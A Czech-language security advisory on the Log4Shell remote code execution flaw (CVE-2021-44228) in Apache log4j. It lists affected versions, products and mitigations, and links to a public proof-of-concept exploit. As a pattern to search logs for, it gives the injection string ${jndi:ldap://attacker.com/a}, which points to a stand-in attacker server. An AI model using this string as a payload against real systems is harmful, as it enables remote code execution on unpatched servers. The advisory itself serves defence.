Před několika hodinami byla odhalena zranitelnost v populární knihovně log4j, která neautentifikovaným útočníkům umožňuje spustit škodlivý kód (RCE - Remote Code Execution) a to pouhým zalogováním uživatelského vstupu obsahujícího specifický textový řetězec.
Vzhledem k tomu, že se jedná o nejpoužívanější knihovnu pro logování v Javě, která je použita v obrovském množství (téměř všech) Java aplikací, ať už přímo, nebo prostřednictvím jiné knihovny, se tyto aplikace ve výchozí konfiguraci automaticky stávají zranitelnými. Ačkoli jsou primární obavy i útoky zaměřeny na zranitelnosti webových aplikací, je důležité poznamenat, že zranitelnost se týká i desktopových aplikací, které budou cílené formou sociálních útoků se škodlivými soubory.
Zranitelnost byla poprvé publikována na Twitteru spolu s ukázkou zneužití zranitelnosti (PoC exploit) zveřejněnou na GitHubu. Zranitelnosti byl později přidělen identifikátor CVE-2021-44228 a přezdívka “Log4Shell”.
Zranitelné jsou všechny verze knihovny log4j v rozsahu 2.0 <= Apache log4j <= 2.14.1.
Pokud používáte verze JDK vyšší než 6u211, 7u201, 8u191 a 11.0.1, neměli byste být ohroženi, protože v těchto verzích není načítání objektů JNDI prostřednictvím LDAP ve výchozí konfiguraci povoleno.
Aktuální seznam zranitelných aplikací a služeb je opravdu rozsáhlý. Zahrnuje služby společností, jako jsou Apple, Steam, Tencent, Baidu, CloudFlare, Amazon. Produkty jako Apache Solr, Apache Druid, Apache Struts2, ElasticSearch. Stejně jako klientské aplikace, jako je Minecraft nebo Ghidra.
Rostoucí, komunitou aktualizovaný seznam zranitelných služeb a aplikací lze sledovat na githubu.
Dnes byla vydána aktualizace log4j-core.jar verze 2.15.0. Již je k dispozici na Maven Central zde, včetně [poznámek k vydání] a [oznámení o zabezpečení log4j].
Pokud není možné tuto knihovnu aktualizovat okamžitě, doporučujeme jako alternativní rychlou opravu následující kroky, které by měly být provedeny dodatečně a jako doplněk k aktualizaci knihovny.
• Pro log4j (od verze 2.10.0) nastavte volbu formatMsgNoLookups=true.
• Pro JDK nastavte možnost com.sun.jndi.ldap.object.trustURLCodebase=false
• Zakázat odchozí připojení k ldap (389/tcp,389/udp) a ldaps (636/udp,636/tcp).
V aplikačních logách hledejte řetězec ve formátu ${jndi:ldap://attacker.com/a}, kde attacker.com/a představuje adresu útočníkova serveru.
Informace obsažené v tomto článku vycházejí z různých zdrojů, včetně počáteční analýzy zranitelností od společnosti Lunasec a oznámení o zranitelnosti od společnosti randori.
Další použité zdroje
• https://www.lunasec.io/docs/blog/log4j-zero-day/
• https://www.randori.com/blog/cve-2021-44228/
• https://issues.apache.org/jira/browse/LOG4J2-2109
• https://github.com/apache/logging-log4j2/pull/607/files
• https://issues.apache.org/jira/browse/LOG4J2-3198
• https://github.com/tangxiaofeng7/apache-log4j-poc
• https://github.com/apache/logging-log4j2/pull/608
• https://twitter.com/dzikoysk/status/1469091718867951618
• https://github.com/YfryTchsGD/Log4jAttackSurface
